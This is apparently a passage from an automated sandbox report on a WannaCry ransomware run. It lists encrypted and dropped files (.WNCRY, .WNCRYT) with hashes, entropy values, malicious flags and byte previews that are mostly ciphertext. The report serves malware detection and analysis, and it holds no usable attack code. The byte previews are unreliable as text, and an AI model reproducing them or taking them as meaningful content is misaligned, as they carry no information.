                                                  Preview:...z.q.....^...<..S..OQ..c.r*Q.MPO|*...7..4L'..c.K.&.qQ..L.i(..C..m...?.QfOJ+...?+....3.A....O..k.....:..x...;.P.k..T.....Y.`.^m1.y.Y....OT....W..v.m._5....1.Q.....c._{..k.*[.l....L(.$.Y}i>..Y.......p...$.G}y.,8.."..A..w.`s$K.......(.=2{.i5..u..f.#.........L.t...8...0.Gy..\...h,.....,M.'.YX.L........IH.kt.N\S..K..W..Z..c....../.tX?...P.e..M....oU....O.j).>*ra:fZj.F1d.$.F.t...C^Y.....9.b.Oh..j....a..=..|.E..*..V....Y.)..c.. ....YB...zSw.X..$..-U.\0.27...... ....q.k.k..x......X.q:y.Rv?. X.p-}9..s...z.....7..FU....vH.s...>.Dj.0t...C...:.&..6I.f.8.x..4Y .....V...t_.e..V.l.......L.7o0...U.a.J..P.R..R.2.S.=q.a,,1.v.`......\M.O...9..7...5v....g.>..g.*.q..V.......l*.C..J.@..%....p..j*.....L"?V.i!.....D'.1....k..[..Ir.R.B0.9.J.)...S.{.....s....W....=.....G...O.d..W......KuHK[....eGw.6.\.lqL.......S..8yfm(...C......\m...5...W.c.y?.7.%..\*.E#.3....~c.:..|..J....M},|....q........R*a..NF../..~......=6&.X..qP....a..0_..B.'.....C..?!..

                                                  C:\Users\user\Documents\QCFWYSKMHA.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85506142651167
                                                  Encrypted:false
                                                  SSDEEP:24:bkJ6HcmNhg1TRYudHh3UBcLcBMY3FKS9gzfv7pf6uSh0tFurW/N6kZ2s2jLT3Tg:bk2SYu7kB6sebfDpCuSDrW/NRZQnTg
                                                  MD5:CF851D67063714AF8BAE7813CFB1FD46
                                                  SHA1:156F91AA790FB32A97C779E749EF12DCB13B4B75
                                                  SHA-256:67E6DE4032EE1F6F341244FD45C552DE723E9E8BB240B493FFEBCB47FF55DA90
                                                  SHA-512:C9D57A86B80404840E9D584FA9E4CB3C762255E3F73353AF6C787E6254304D5E3269B1CEEBE869A9AB674D5CF721B242362DB343ADD70B40B7C774DAD00189D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...../i..M,."..._...FR.<.....k..../[U...m.24.i.~6w...Jz....u.QR.c.3H_..4.u.t.@...A.P..~uKM..O.....+F...Z...D..}..V7Q.".&|*.s%..iZ.1..2...Z.......Js...3.#..<:.....=.z..ED......uT.....$j...?..q-.u.`....!..x./..-..Y..(O1iJ.......q..J..9.....r..............j........&'k.Q.....N....d..SU..8.J....w...P..^?h.."'...xb.k......[.8.%.iCk~@.}.9nX.z..d......}.....G.n..5..V..O...4-.....vO..O9..~?A. .'.gB..2.*.......f..g..X,|W..)...?.).."S..k....Wez.d+.}..I....O.#.A#e....;.Y8K..}....}@....x...o$...F:.8.w..A.r.]#.2............a....=8.dM..`....8..%..+.>.#B.6!.g2.jp(].{i...qxh......z.`...h./....q.z%.U.u..-..PADP...m..m.%.......b...,W(h.......a..:X..g.nY_..=..g..."?..E..X..ujI1Hb0.g.]u.1..K.t..B.-.;?."MC..6V.8..:..R..>..=...2.]..5.Y..}...y.s&.S...!Z.@y.-._.cA.P9.Dy0.....N..g%.=0A.Z...d7.....P..f2.;.....){..=.~^q.....4.O......]w_.>t$..8b]...vU.`."9.*...Z.B.....w.l..6.....S....)..d.b....h.PAYN..O......-....~s#. ...n.f.S...V....bD..j.+0.~.e.

                                                  C:\Users\user\Documents\QCFWYSKMHA.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85506142651167
                                                  Encrypted:false
                                                  SSDEEP:24:bkJ6HcmNhg1TRYudHh3UBcLcBMY3FKS9gzfv7pf6uSh0tFurW/N6kZ2s2jLT3Tg:bk2SYu7kB6sebfDpCuSDrW/NRZQnTg
                                                  MD5:CF851D67063714AF8BAE7813CFB1FD46
                                                  SHA1:156F91AA790FB32A97C779E749EF12DCB13B4B75
                                                  SHA-256:67E6DE4032EE1F6F341244FD45C552DE723E9E8BB240B493FFEBCB47FF55DA90
                                                  SHA-512:C9D57A86B80404840E9D584FA9E4CB3C762255E3F73353AF6C787E6254304D5E3269B1CEEBE869A9AB674D5CF721B242362DB343ADD70B40B7C774DAD00189D0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...../i..M,."..._...FR.<.....k..../[U...m.24.i.~6w...Jz....u.QR.c.3H_..4.u.t.@...A.P..~uKM..O.....+F...Z...D..}..V7Q.".&|*.s%..iZ.1..2...Z.......Js...3.#..<:.....=.z..ED......uT.....$j...?..q-.u.`....!..x./..-..Y..(O1iJ.......q..J..9.....r..............j........&'k.Q.....N....d..SU..8.J....w...P..^?h.."'...xb.k......[.8.%.iCk~@.}.9nX.z..d......}.....G.n..5..V..O...4-.....vO..O9..~?A. .'.gB..2.*.......f..g..X,|W..)...?.).."S..k....Wez.d+.}..I....O.#.A#e....;.Y8K..}....}@....x...o$...F:.8.w..A.r.]#.2............a....=8.dM..`....8..%..+.>.#B.6!.g2.jp(].{i...qxh......z.`...h./....q.z%.U.u..-..PADP...m..m.%.......b...,W(h.......a..:X..g.nY_..=..g..."?..E..X..ujI1Hb0.g.]u.1..K.t..B.-.;?."MC..6V.8..:..R..>..=...2.]..5.Y..}...y.s&.S...!Z.@y.-._.cA.P9.Dy0.....N..g%.=0A.Z...d7.....P..f2.;.....){..=.~^q.....4.O......]w_.>t$..8b]...vU.`."9.*...Z.B.....w.l..6.....S....)..d.b....h.PAYN..O......-....~s#. ...n.f.S...V....bD..j.+0.~.e.

                                                  C:\Users\user\Documents\QNCYCDFIJJ.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808219026271454
                                                  Encrypted:false
                                                  SSDEEP:24:Lcq8odOoQ/3OWtxHZcdOzykjTG4hXT0O5vlz3hOdHd19Jj/b:LcCOH/3OyHZeOzyEK4hXT0Obz3hOdHdp
                                                  MD5:4BF44035F161D1D2F36025E33433A828
                                                  SHA1:98074E2581F90920533ACBD7C4F642E99D169D21
                                                  SHA-256:C682816FD03CFE710DA1359784CFD44ED43B91B60BDA3F42E0EF4709BA68B465
                                                  SHA-512:4AB005DA66377FDBC7118B8A4D6EF36D733F9FF141AC17E22B483CF1580B35E6474432334ECB4CC1DFE33518B0A99B0A0FC5EF397D1F0823A0BD0D4C4E79DEB8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:/...e.X...`K........o..ZY.....1...}.q..V&;.0OI+b.O.k&.=...F#.<.....h...b../..]c..\.E...~&.....:..3......ob..B.:...-...'.....F.."(L;.........@...H..YC......,....YU.Y.."..r:.QR...M......:.......>..V!0.(...`$B..F. P..R.,8.G.....D...8.@........./..../.0......*.u-..[...`.s. ..3.+\.........MJ..........~.i......p.?...\V......'...)(.7....Hm...(a.?;s3.5.t.".V.jAZ.2....MT..8<<..AR...*....t.g.+=....p...$..j..^n.?P.S'=_A.....d..;..#.Y..\.:.p....|...p7...^.}..mk..n5R.b..._nhC...<B....O.......[.....?xED...0...-...KT.cD&.}...e.A..@.IRb.^;.<.b.9t.?d.5..W.. .....~..d2Ds....]..5\Q.`s...].$....Kx%...p.i^$.API5...,.vMa..5p&..Z....-.A....A..{.A.....|.:.!7..4.....Mz......)..r.....<zSi..4l..K...U.%.K.........\..;.3...X......M2.+..+.?..._oM..7.......$....x.}.x..........2&N.....fC....%7. ..(./9]......n........'....*.1.@].....DnA.....#..D."..R^d..~.+f......n..V..&.n.............LB.."...%..*... `...pQ....[G..G.....N..`e.)...o........;'s..7.,iot..R

                                                  C:\Users\user\Documents\QNCYCDFIJJ.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846634920248611
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2P9x+HPsCqtntXpeKFvynMA+uyuXIesMJtuZ0zD5Y/aJSLJORmk:bkF2P9xuPqtntXpeCSB+ujTsybzlJSLA
                                                  MD5:14A31C8DE8D284CF2462F533B1214A20
                                                  SHA1:1E63901AECC75DD1D2B989671E7B0631158DF7A7
                                                  SHA-256:93CF59495E4D64F79E129A5C4A03066B0E3AEE14B2706E04C9C9E44C7845A33B
                                                  SHA-512:0B1FCD8D40595116E890B7237CB20E39F0D78AAB394770553A7683F0E0003443CD8E07EB45DC5A6967A5C572A38EB1177971A30998C2AEFD455D59CAB02D0AEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........r..o.....Q.|........._...$.^.G.'...g...#X.a...S6@U2.x..$...7....TT...n.[...,b.......i.f._.|.'=C<.....7O.r5....-jVK...(.w.,..U..._...G....0.HL...fv.3.(.zp.x...v.#....u.j.%......$.M.d.....?d.i...e.7J.......$k.y...9.!I..._..X...%U.v3..gw.BS'.............D %.8.W..a.............R../R1....co.y..:..?......n..jO.!...l..}H....~k.%M\.v.*a.Q.;.N.J<.e..)#|.(^...7%.`Cz...T..q..>...3...vJ.t..&.<V<.....z.N.........7.b....|.I*......l......U_...q.XX...E).brF%Q.)...%.|S...:.Hq8.H.e...e.D..H..<h..I.s..d`.Pxr5h....@.PU.)...,...h.{'....-..&>....~..Xh.....%xM..f...++.....7J$^.SQ,.A.{7CP..[.R...L@..o.... ..(;..:4....-.o.......l......fus...,.....++G..Z_..|S'...%..#P.O.y.r...P...o.k...%.R.O..............@6.n.qo..$=..t+y.q.v<.#.....u....2...h.j\:.o.k..".....{...a....rMD..0x$.m....n*S%y..E......8.H]t.7......%.s.}I.............6.AJL.....}.".......X...l..g.!..&.iZ..t.....-z....8..c.`.'..u..]...$O ~.:...L[7u.V..EH...5..Av...38W./.....Zo..

                                                  C:\Users\user\Documents\QNCYCDFIJJ.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.846634920248611
                                                  Encrypted:false
                                                  SSDEEP:24:bkF2P9x+HPsCqtntXpeKFvynMA+uyuXIesMJtuZ0zD5Y/aJSLJORmk:bkF2P9xuPqtntXpeCSB+ujTsybzlJSLA
                                                  MD5:14A31C8DE8D284CF2462F533B1214A20
                                                  SHA1:1E63901AECC75DD1D2B989671E7B0631158DF7A7
                                                  SHA-256:93CF59495E4D64F79E129A5C4A03066B0E3AEE14B2706E04C9C9E44C7845A33B
                                                  SHA-512:0B1FCD8D40595116E890B7237CB20E39F0D78AAB394770553A7683F0E0003443CD8E07EB45DC5A6967A5C572A38EB1177971A30998C2AEFD455D59CAB02D0AEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........r..o.....Q.|........._...$.^.G.'...g...#X.a...S6@U2.x..$...7....TT...n.[...,b.......i.f._.|.'=C<.....7O.r5....-jVK...(.w.,..U..._...G....0.HL...fv.3.(.zp.x...v.#....u.j.%......$.M.d.....?d.i...e.7J.......$k.y...9.!I..._..X...%U.v3..gw.BS'.............D %.8.W..a.............R../R1....co.y..:..?......n..jO.!...l..}H....~k.%M\.v.*a.Q.;.N.J<.e..)#|.(^...7%.`Cz...T..q..>...3...vJ.t..&.<V<.....z.N.........7.b....|.I*......l......U_...q.XX...E).brF%Q.)...%.|S...:.Hq8.H.e...e.D..H..<h..I.s..d`.Pxr5h....@.PU.)...,...h.{'....-..&>....~..Xh.....%xM..f...++.....7J$^.SQ,.A.{7CP..[.R...L@..o.... ..(;..:4....-.o.......l......fus...,.....++G..Z_..|S'...%..#P.O.y.r...P...o.k...%.R.O..............@6.n.qo..$=..t+y.q.v<.#.....u....2...h.j\:.o.k..".....{...a....rMD..0x$.m....n*S%y..E......8.H]t.7......%.s.}I.............6.AJL.....}.".......X...l..g.!..&.iZ..t.....-z....8..c.`.'..u..]...$O ~.:...L[7u.V..EH...5..Av...38W./.....Zo..

                                                  C:\Users\user\Documents\QNCYCDFIJJ.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PGP Secret Sub-key -
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831915502669585
                                                  Encrypted:false
                                                  SSDEEP:24:JZs6DzBupkw2RIZXULGoXdxdbqLxEzeSrShmM+ClKd9tcs:ck+klaJoX7Bw+eSrjkkAs
                                                  MD5:54D49E9DA9BFF2DEBF5CC198FFCA9FBE
                                                  SHA1:4482183E0F6F98B0F29AC752938013018071A328
                                                  SHA-256:E85815B411E69AB303424D7E21F95F7E141D39150D9B85A7408BDD0C430F86AD
                                                  SHA-512:8358EA84D38CA71E7DC8CB38E6458CB9ED0C2DDE142C602F15DB118A1FF80EDE1F85569476F60283AEEAFD3E01A7C5DD0B4A001E7B1B65F49A4D191A5DE8ED73
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..P.`*o.HA4^.jF.O........%.x@#...F .0.+H..]V^...Z..}.c.u2....":.e...P..Y.....n...W..sy.i.c*......V.....O...~.^}C..^.w.........9.....a.0.A..G...U..l....|L..MQ0.<...S.VA........|u...3.>..ld...[....6.qBE.J.....[...}.n."..[..r....i+<...au..q.bA..\DKO..8..#mrJ....x..J[Rd..)[.......d..i..F5.V.u...'EF5U............U...(.W../N.;.....Kqx8...s6..Z..:...}.....PfNb..e)C..`.fKz..%....b..M....%M..j. ebT..mC(....4..7......y...{....,Z..o8..l.Xv.e..l|.p';.....4.:..8P%.z..Mu.+.[.a.Dr.%g.... p.*..D.......{.7"5v#..;'o..P....WZ.+....5...6...@.\Ry,.....F....P.....sR.+c}.i8..U>.v3U..-....i....=..u....{S.7./I..K.)Z.......'....#....I...@...p..#.~X<..9..@..w..D..P#..a.O....m\...to....Y.E.wrJ.dPIU\c<..oB.}!.pH....C...$......g..s.4%.6...[:....k..ro..L.{L..KR.....&F.lq...i.V..F...Z+...WM.P..@.0..(I...?.....-..q<....y6].]..M...".'.....~..!.......l ...2qN..E....?.>.....>..1f_^bm.Z8..G.kQ..Z.2..{D..O.u.;.V6._.....#j...i.=P+2...Bp..f.$x|T.VY/.P....L.G.....MY...T....m....4

                                                  C:\Users\user\Documents\QNCYCDFIJJ.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852055707472461
                                                  Encrypted:false
                                                  SSDEEP:24:bkVCSi1OfH/3OKZGAqUetIu734eelrU9/VD/ns2FJPL0H/8XfXrMUITmztXnKpoN:bkVCzYfH/3Opaur4eelM1/s27z00vXr1
                                                  MD5:7229FDE467F4907DEF2E26F5DCA3E5E8
                                                  SHA1:679DAA61C240F3E100D5E3D0EFFCCF6976C1E15C
                                                  SHA-256:650FAEC7C884AF02AC663F67770575F8DC8FDF06FCDCEAFDCC8CDA6E334FEE94
                                                  SHA-512:BA6C2BFD60888F0D498EDD4E9FA0D9313F2EBE206CC0F42581DB63475F281710B3D1D450C43FAE2DC170AD2172343A97D5D54DC9C055ECEFCD4EE64486ED6D13
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....l,%]@...Gu..%q.s...kFWx..K'Pqh......:../m'\Z..w....."?Yt......../..j......7u.k.^.L.*..|.....#..7{...b.6.d.f....U!..q....=|r...I7V._(.;.J..@`.*.......+...M.~.K0g#.Y.M.M....0..b0c.........:.m..L.......!i..L2.i...%.i...C._.Zo.<;..hp....0..a.2.V............m]]..i..bh_.7'iU.(.b.a..(2..b....p.zyNp._..qU.{.N-...A./{.}?..Tsm.......J.[..J.Z:}_.Wp..dgS.DH.h.PV~......A:...m[.<.2.6.....K...........6c..3..W...Yc......pr...p.h.].....f..!...D.Q=H...,..id`-.|..AA.<`.K..4...5.4: YI$...........%X.A.>w.*"..1.u06T.k...8~.].\.62..(...c....M6...i.K....vT..|....#6....;n.E..k....`...j!s...`.. I...].....U.SG~....f}.[./-........\4..Pk....AQX........MR...+..j..x.>.7....t....W_..4.q..g.k....;Y.z..8I.RR..p../..2.'..e.~*z.n.~.U..G.....*{..X..N..yXx.M#....l..##h.hy...o.>%..uOk.....u5K...p.|..j....\.%=..3K./..,.%.[..?Q.b*v..N..<..>..D|..6.r~ .o...|.E..f....=.\.2..D..@...u>....JfH..X..De..!f.u..m.4].r.7.&>..d.0.Y.K.GW......5.....@.{..B.D1.........6B.Wf:a?..d.GF|..

                                                  C:\Users\user\Documents\QNCYCDFIJJ.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.852055707472461
                                                  Encrypted:false
                                                  SSDEEP:24:bkVCSi1OfH/3OKZGAqUetIu734eelrU9/VD/ns2FJPL0H/8XfXrMUITmztXnKpoN:bkVCzYfH/3Opaur4eelM1/s27z00vXr1
                                                  MD5:7229FDE467F4907DEF2E26F5DCA3E5E8
                                                  SHA1:679DAA61C240F3E100D5E3D0EFFCCF6976C1E15C
                                                  SHA-256:650FAEC7C884AF02AC663F67770575F8DC8FDF06FCDCEAFDCC8CDA6E334FEE94
                                                  SHA-512:BA6C2BFD60888F0D498EDD4E9FA0D9313F2EBE206CC0F42581DB63475F281710B3D1D450C43FAE2DC170AD2172343A97D5D54DC9C055ECEFCD4EE64486ED6D13
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....l,%]@...Gu..%q.s...kFWx..K'Pqh......:../m'\Z..w....."?Yt......../..j......7u.k.^.L.*..|.....#..7{...b.6.d.f....U!..q....=|r...I7V._(.;.J..@`.*.......+...M.~.K0g#.Y.M.M....0..b0c.........:.m..L.......!i..L2.i...%.i...C._.Zo.<;..hp....0..a.2.V............m]]..i..bh_.7'iU.(.b.a..(2..b....p.zyNp._..qU.{.N-...A./{.}?..Tsm.......J.[..J.Z:}_.Wp..dgS.DH.h.PV~......A:...m[.<.2.6.....K...........6c..3..W...Yc......pr...p.h.].....f..!...D.Q=H...,..id`-.|..AA.<`.K..4...5.4: YI$...........%X.A.>w.*"..1.u06T.k...8~.].\.62..(...c....M6...i.K....vT..|....#6....;n.E..k....`...j!s...`.. I...].....U.SG~....f}.[./-........\4..Pk....AQX........MR...+..j..x.>.7....t....W_..4.q..g.k....;Y.z..8I.RR..p../..2.'..e.~*z.n.~.U..G.....*{..X..N..yXx.M#....l..##h.hy...o.>%..uOk.....u5K...p.|..j....\.%=..3K./..,.%.[..?Q.b*v..N..<..>..D|..6.r~ .o...|.E..f....=.\.2..D..@...u>....JfH..X..De..!f.u..m.4].r.7.&>..d.0.Y.K.GW......5.....@.{..B.D1.........6B.Wf:a?..d.GF|..

                                                  C:\Users\user\Documents\SQSJKEBWDT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:COM executable for DOS
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.83373114041739
                                                  Encrypted:false
                                                  SSDEEP:12:DSbb8aBI+1NLvu1GoEL+hUImxvSd/WZ6p3cxlLZe51jew9RxneZdz5J5ZfWsy4YT:DwBDeuLpbUQ6nzqkheF1+sy4BMiHhSv
                                                  MD5:0B30E125E00E569F08D183A0AFBA1AC0
                                                  SHA1:0686DE7755B4158918880BF029D0493EFFD90BE2
                                                  SHA-256:7C730340DA27BCC506CA6A79F81AF8CA42DBB8F30BA66C14F06DA17AA6884D2F
                                                  SHA-512:71F8805A92A11AE654E04C7D5346AC35D3583E74B95C0349CFDA786521C9FC7A846ECEB333BE298AFB532CF29C20AA6517E365EF55356ED0DC7AECFE505F0C6D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:..[...t."...\uVy.j...vY......*T.y38.J+...1..4......-.......='Bi....3K....^.,...v......lr..*....O..s.5...V.p.M...G6...[p.u..{.....><gN.O..............O..y,0..i.xO'_..!.al....o...o..>^:..}.K&.....[..@".............~f%..NJv.c.\..#...4.g#..~.J_}..`.....5@..$#.....B.=.[...$......_O;.6.y..'.....e.g.E...w.J..'.m..B.e.........[;.=....}zL....h....6...S]..F....|.....G.9n%8..'i.rb,'.H....Y..\j...$.0b.F../...W1.z..L..+...(.qW...m.U.h";..e.w......s..p...E,.'.p..`,._.-2...C&.P\.SN.1.9W.H.T .SX..n.:s..8;h..4...0mT.}.pt........X....mi...{z#N:...L.p..q..1S8.).1.w.j..a7...#.....]#m..).........m*.u."....U.|....P.....|.QoMM.@Zf.f..z[..X%..m.8a5.A..k.%......e.........U.....HS.^*i.................U.1#.....5.$q.s....X<O%q......w.s>.68....Z...B.5.B..b4...k...]........c...lk,.....B..a}.W.....ce.......? ..?.....j.....4._.|7...h-....[Eq.. "..?xbLF...9..5.%&6.i...7X..v`..{.G.BP..g4..5...d.bH...zs..(..G.....7.x.W..+.k..........O.m....U#.4.P.cA;.Py..U3.

                                                  C:\Users\user\Documents\SQSJKEBWDT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851463239021162
                                                  Encrypted:false
                                                  SSDEEP:24:bk1RUmPRXeGdKxxF2nvIJMgr9YONDVsDBW0XS/UjkMjQhYsOdE+vcOXyo7Nt0e9y:bkQm6Gv3UjNDVUW0i/UY2iYvfvGoEQgf
                                                  MD5:29512E14761359490DFBDB9191C1CA55
                                                  SHA1:ACE259B0AFAF05C31144F283D6702ADB31FC3539
                                                  SHA-256:3AE8EE268C19D3ED9049D67140BEFACB48A0B24B54722AE8C1BCF567F8FFAFC8
                                                  SHA-512:FD23F434C9DD645806CD4E09FD015E17291E3C613486A32AC973B222E3A55390B7CAA3769F1D71F97EA28218020CFA6F29D3BA4F26917967C3237AE44F5EEFCD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....z...W.0Z.8x.FO.y..0[O.`.z.Cc....}..~.(u_.J.hd:Q.r8tb........+.Z.V..F....<.G.%:......&....qA......+.a.X........DG3..p.[.b..C...D...........JbG...`^p&9C..* ._..e$T...Moa&.|~../.%..5..... ..Rg0...Gb6&.I...iU....Cl.......6S.g......H..K....0..x..O.............g.x. ...nc@F.</.q...j.....{.Ug......).b..d.<k....4.Z.....V.L.N!..~..}..{~"..l.N.1..1.&..4cI=v..P.....}ab..p.;..1.F...>.......,....e...'...Yp...9$.fc.a...Q.R....8.>:5d.4.....A...^dT.f.#...M<.Y...Lt.Nc.....<..P.~...@..n~.!...-cY.........m.M.)..Pd^X.s*%Ab&.....}.3.#5L...~.Y}7..]...2.'...Va....;{........!...'\2...X....hD.).|....w...M.J...V...t......./.&.c...e..i....l=`...;.z....hv..`..A....g9Z....!s.........K.....QI...[....-..p......._$..I.=...N..6.n..od.eb.O.?J\fbx.%|AWt.G3.R....,B.8.........p.5.9..j.r(....bG>g.2...........?z".e.@> ....y ....L..(...........i.....}d........F.n..H......X.,J.'.$...6R..%.5..2....P.T.....i..Q).iV....a..:.0.%.hO....q&.....g...h.p...q.E..u...tb.M

                                                  C:\Users\user\Documents\SQSJKEBWDT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851463239021162
                                                  Encrypted:false
                                                  SSDEEP:24:bk1RUmPRXeGdKxxF2nvIJMgr9YONDVsDBW0XS/UjkMjQhYsOdE+vcOXyo7Nt0e9y:bkQm6Gv3UjNDVUW0i/UY2iYvfvGoEQgf
                                                  MD5:29512E14761359490DFBDB9191C1CA55
                                                  SHA1:ACE259B0AFAF05C31144F283D6702ADB31FC3539
                                                  SHA-256:3AE8EE268C19D3ED9049D67140BEFACB48A0B24B54722AE8C1BCF567F8FFAFC8
                                                  SHA-512:FD23F434C9DD645806CD4E09FD015E17291E3C613486A32AC973B222E3A55390B7CAA3769F1D71F97EA28218020CFA6F29D3BA4F26917967C3237AE44F5EEFCD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....z...W.0Z.8x.FO.y..0[O.`.z.Cc....}..~.(u_.J.hd:Q.r8tb........+.Z.V..F....<.G.%:......&....qA......+.a.X........DG3..p.[.b..C...D...........JbG...`^p&9C..* ._..e$T...Moa&.|~../.%..5..... ..Rg0...Gb6&.I...iU....Cl.......6S.g......H..K....0..x..O.............g.x. ...nc@F.</.q...j.....{.Ug......).b..d.<k....4.Z.....V.L.N!..~..}..{~"..l.N.1..1.&..4cI=v..P.....}ab..p.;..1.F...>.......,....e...'...Yp...9$.fc.a...Q.R....8.>:5d.4.....A...^dT.f.#...M<.Y...Lt.Nc.....<..P.~...@..n~.!...-cY.........m.M.)..Pd^X.s*%Ab&.....}.3.#5L...~.Y}7..]...2.'...Va....;{........!...'\2...X....hD.).|....w...M.J...V...t......./.&.c...e..i....l=`...;.z....hv..`..A....g9Z....!s.........K.....QI...[....-..p......._$..I.=...N..6.n..od.eb.O.?J\fbx.%|AWt.G3.R....,B.8.........p.5.9..j.r(....bG>g.2...........?z".e.@> ....y ....L..(...........i.....}d........F.n..H......X.,J.'.$...6R..%.5..2....P.T.....i..Q).iV....a..:.0.%.hO....q&.....g...h.p...q.E..u...tb.M

                                                  C:\Users\user\Documents\ZQIXMVQGAH.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7926358695836955
                                                  Encrypted:false
                                                  SSDEEP:24:N7vTmupoOQiqmXeTnumMAm7Ey4/EBB5zYsvfx:N7vCuGOQUOTnuvDE7aLd3x
                                                  MD5:05BBDC74048BAF5700EAC9F0F502B2E2
                                                  SHA1:8D9F939696CE848D964B7262654EFE8A4354AF1D
                                                  SHA-256:F4A3B1744C479D99238E2FF65C738BF2A21C08F3F60EF232584769023AD566EF
                                                  SHA-512:BA8C791B57D1E1145D6264B1C05E9302341D143C8BA5A65D198CA4D9FB3C0517869F9268A31CC67A21B3C40740CB3BA26AA1987F3224F34C25A00E87AB4C53AD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.%..)..V..fa..%W..e#.(.e#...&.cP+Y_..:7$.Q..v.jP.....f....s.I.}...../_..j.!.Mg;U.y^m..5U..$5..m.5.}...u...6<....;.-....~..;'.OW.,.ZH]..w........j../.m..9W.bEi..:-.l.?.Z. .c......&j.<.C].L.A.Q..........Egj../...%.$.%..K.ZQ.......X. .!.Q.....?....86..ZH*Q.h...;.-V.L.5...M...j...:....@.........;L...)\r...q{-..z..t...P.R<.%.a:....;.....F.....=.g..@..~z4q.e/..F.L......sFbF'..C...SP&...k.V...N.g.u..$..M..B.0.C..=k..0.IRA..N.!v...\!..Y...TAsZ.E.{>............/h..TJ.....B@...;"L!...+U.....cZ y..^(:....\....R....B.......i.._.l^2@.b=7......}....!..g$...%j......h:.b......E.%QXE.S...08...W.....EP.o..\Mn..y.Ye^..o8.7.^r......N.....?. .s.`.@.g/.i..i^.iY.a...0~...?...E.').S......A.s..a..}..Uo.oP....0....F..1.......:)...m/.=.3y*.........3]......>.:....?)[7.5..U.....CU.l.].~.O3gHKb....Vg....s.%...R..?.|..u...B.u....t-Ey..o{..c.M/..P[..T..APR>....6.D..#./"wL...+O..H.....u.."......# ....{@.N..Z..2...>;.:..E.}..R..Ro.u$.@.?...Q.B'..4il...{..c.E".,

                                                  C:\Users\user\Documents\ZQIXMVQGAH.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.826806008416017
                                                  Encrypted:false
                                                  SSDEEP:24:bkFzTKynCCvRoRSn1/LJDTD3cVOu19UrKoahB2mYt59BGpBcx7d7Xh/1Pl8I:bkFzeynCCGR4J73Ju3U+PC/ySJXh/1OI
                                                  MD5:BE4918347EF43FD8FF639AF59B9B2FD9
                                                  SHA1:CBB7C1DF73A2B696E47832178D00FF6ADF73A9F2
                                                  SHA-256:3508FDC65A3A8DE02E63B0F62D404D7ABAF897413EAE1003AC265BEDE018C6BC
                                                  SHA-512:517213A7D92DD8D165EF457F67E78B3AE468BDA02793C88B6B4EEE47D9EE76583A82CD0453E1F2FE061023FC44411E06F6A6586159ABEACCDC5E989B0A335C3E
                                                  Malicious:false
                                                  Reputation:unknown
